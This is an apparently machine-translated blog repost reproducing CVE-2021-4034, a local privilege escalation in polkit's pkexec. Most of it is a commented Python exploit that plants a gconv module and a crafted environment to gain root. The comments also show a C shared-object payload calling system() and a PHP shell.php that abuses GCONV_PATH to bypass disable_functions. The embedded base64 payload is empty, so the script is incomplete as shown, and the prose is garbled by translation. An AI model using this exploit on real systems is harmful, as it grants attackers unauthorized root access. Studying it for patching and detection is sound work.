当前位置:网站首页>Cve-2021-4034 reappearance

Cve-2021-4034 reappearance

2022-06-23 02:50:00 asura

  • cve-2021-4034 Reappear
    • scope
    • exp Code
    • Reappear
    • Reference resources

cve-2021-4034 Reappear

Linux Polkit Loopholes in local rights

cvss score 7.8 High-risk

polkit Of pkexec There is a local privilege escalation vulnerability An attacker who has obtained normal privileges can use this vulnerability to escalate to root jurisdiction

polkit common linux Distribution version There are polkit modular deepin Developed dde-polkit-agent comply with freedesktop standard

polkit yes linux An identity authentication management tool in the system usage pkexec /usr/bin/ls pkexec Binary executable

scope

because polkit It's the tool of the system Main stream linux Versions are affected

exp Code 

from ctypes import *
from ctypes.util import find_library
import os
import zlib
import base64
import tempfile

payload = zlib.decompress(
    base64.b64decode(
        """"""
    )
)
libc = CDLL(find_library("c"))
# ctypes Two are provided LibraryLoader:CDLL and WinDLL
# CDLL Support __cdecl,WinDLL Support __stdcall( Limited to Windows)

libc.execve.argtypes = c_char_p, POINTER(c_char_p), POINTER(c_char_p)
libc.execve.restype = c_ssize_t

wd = tempfile.mkdtemp()
# tempfile  modular   Generate temporary files and temporary directories  
# tempfile  The module also provides  tempfile.mkstemp()  and  tempfile.mkdtemp()  Two lower level functions 
#  High level functions support automatic cleanup , It can be done with  with  Statement together , Low level functions do not support , It is generally recommended to use high-level functions to create temporary files and directories 


open(wd + "/pwn.so", "wb").write(payload)
#  take payload write in  pwn.so in 

os.mkdir(wd + "/gconv/")
#  Create directory 
open(wd + "/gconv/gconv-modules", "w").write(
    "module  UTF-8//    INTERNAL    ../pwn    2"
)
#  write in 
os.mkdir(wd + "/GCONV_PATH=.")
#  Create directory 


'''
 About GCONV_PATH Knowledge about 
php In execution iconv Function time , Actually call glibc Medium iconv Correlation function , There is a function called  iconv_open(),
GCONV_PATH  yes  linux An environment variable of the system , This environment variable allows you to  glibc Use user-defined  gconv-modules  file 
module  Custom character set name capitalization // INTERNAL ../../../../tmp/ Custom character set name lowercase  2

 The process 
1.  Set up GCONV_PATH  Point to  gconv-modules  file 
2.  perform php Of iconv function  , The essence is to call  glibc Of  iconv_open  function 
3. iconv_open  function   according to  GCONV_PATH  find  gconv-modules  file 
4.  according to  gconv-modules  file   Indication found   Parameter corresponding so file 
5.  call so In the document  gconv() gonv_init()  Here are the commands we want to execute 


#include <stdio.h>
#include <stdlib.h>
void gconv(){}
void gconv_init(){
    system("id");
}

gcc 1.c -o  Custom character set name .so -shared -fPIC

shell.php
<?php
    putenv("GCONV_PATH=/tmp/");
    iconv(" Custom character set name ","UTF-8","whatever");
?>



bypass disable_function

https://blog.csdn.net/qq_42303523/article/details/117911859


'''


os.mknod(wd + "/GCONV_PATH=./gconv")
#  Create special files 
'''
mknod name {b|c} major minor

mknod name {p}
 establish FIFO  Named pipe 

mknod dev/null c 1 3
mknod dev/zero c 1 5
mknod dev/random c 1 8



b  Indicates that a special file is a block oriented device   disk   floppy disk   Magnetic tape 
c  Indicates that a special file is a character oriented device   Other equipment 
p  establish  FIFO  Named pipe 






'''

os.chmod(wd + "/GCONV_PATH=.", 0o777)
os.chmod(wd + "/GCONV_PATH=./gconv", 0o777)
os.chmod(wd + "/pwn.so", 0o777)
#  Modify the permissions 

os.chdir(wd)
#  Change the directory 

cmd = b"/usr/bin/pkexec"

# └─$ pkexec --version                                                                       127 ⨯
# pkexec version 0.105

# └─$ pkexec                                                                                 127 ⨯
# pkexec --version |
#        --help |
#        --disable-internal-agent |
#        [--user username] PROGRAM [ARGUMENTS...]

# See the pkexec manual page for more details.


argv = []
envp = [
    b"gconv",
    b"PATH=GCONV_PATH=.",
    b"LC_MESSAGES=en_US.UTF-8",
    b"XAUTHORITY=../gconv",
    b"",
]

cargv = (c_char_p * (len(argv) + 1))(*argv, None)
cenv = (c_char_p * (len(envp) + 1))(*envp, None)
libc.execve(cmd, cargv, cenv)
#  perform

Reappear

Reference resources

https://nosec.org/home/detail/4959.html https://blog.csdn.net/qq_38402294/article/details/121388917 https://www.freedesktop.org/software/polkit/docs/latest/pkexec.1.html

原网站

版权声明
本文为[asura]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/01/202201280956024801.html

边栏推荐

猜你喜欢

随机推荐